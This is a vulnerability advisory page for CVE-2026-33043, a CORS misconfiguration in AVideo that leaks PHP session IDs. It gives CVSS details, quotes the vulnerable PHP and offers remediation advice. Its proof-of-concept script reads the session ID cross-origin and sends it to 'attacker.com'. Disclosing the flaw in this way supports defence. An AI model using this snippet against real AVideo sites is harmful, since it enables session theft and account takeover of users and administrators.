What is the CVSS score of CVE-2026-33043?

CVE-2026-33043 has a CVSS 3.1 base score of 8.1 (High). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N. EPSS exploitation probability: 0.0%.

Which versions of PHP are affected by CVE-2026-33043?

AVideo installations are vulnerable to complete account takeover of any user, including administrators, if victims visit an attacker-controlled website while logged in.. A patch is available.

PHP CVE-2026-33043

HIGH

Permissive Cross-domain Security Policy with Untrusted Domains (CWE-942)

2026-03-17 https://github.com/WWBN/AVideo

GHSA-qc3p-398r-p59j

PHP Information Disclosure Cors Misconfiguration

8.1

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

Required

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

None

Lifecycle Timeline

Analysis Generated

Mar 17, 2026 - 20:30 vuln.today

Patch released

Mar 17, 2026 - 20:30 nvd

Patch available

CVE Published

Mar 17, 2026 - 19:52 nvd

HIGH 8.1

DescriptionNVD

Summary

/objects/phpsessionid.json.php exposes the current PHP session ID to any unauthenticated request. The allowOrigin() function reflects any Origin header back in Access-Control-Allow-Origin with Access-Control-Allow-Credentials: true, enabling cross-origin session theft and full account takeover.

Details

File: objects/phpsessionid.json.php

php

allowOrigin();
$obj = new stdClass();
$obj->phpsessid = session_id();
echo _json_encode($obj);

No authentication is required. The allowOrigin() function in objects/functions.php (line ~2648) reflects the request Origin:

php

$HTTP_ORIGIN = empty($_SERVER['HTTP_ORIGIN']) ? @$_SERVER['HTTP_REFERER'] : $_SERVER['HTTP_ORIGIN'];
header("Access-Control-Allow-Origin: " . $HTTP_ORIGIN);
header("Access-Control-Allow-Credentials: true");

This means any external website can make a credentialed cross-origin request and read the session ID.

PoC

An attacker hosts the following page:

html

<script>
fetch('https://TARGET/objects/phpsessionid.json.php', {
  credentials: 'include'
})
.then(r => r.json())
.then(d => {
  // d.phpsessid = victim's session ID
  document.location = 'https://attacker.com/steal?sid=' + d.phpsessid;
});
</script>

When a logged-in AVideo user visits the attacker's page, their PHP session ID is stolen via the permissive CORS policy, allowing the attacker to hijack their session.

Impact

Account Takeover - Any logged-in user (including administrators) who visits an attacker-controlled page will have their session stolen. The attacker can then impersonate them with full privileges.

AnalysisAI

AVideo (WWBN_AVideo) contains a critical CORS misconfiguration vulnerability that exposes PHP session IDs to any unauthenticated external website, enabling complete account takeover of any logged-in user including administrators. The vulnerability has a working proof-of-concept exploit and requires only that a victim visit an attacker-controlled webpage while logged into AVideo, making it highly exploitable with an 8.1 CVSS score.

RemediationAI

Within 24 hours: Identify all AVideo instances in your environment and assess active user bases; notify users of the risk and recommend logout. Within 7 days: Apply the available vendor patch to all AVideo installations and verify successful deployment. …

Analysis

Detailed AI-generated intelligence summary covering attack vector, impact assessment, affected versions, remediation steps, and indicators of compromise.

POChttps://••••••••••.com/exploit

PATCHhttps://••••••••••.com/patch

ADVISORYhttps://••••••••••.com/advisory

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

CVE-2026-33043 vulnerability details – vuln.today

Back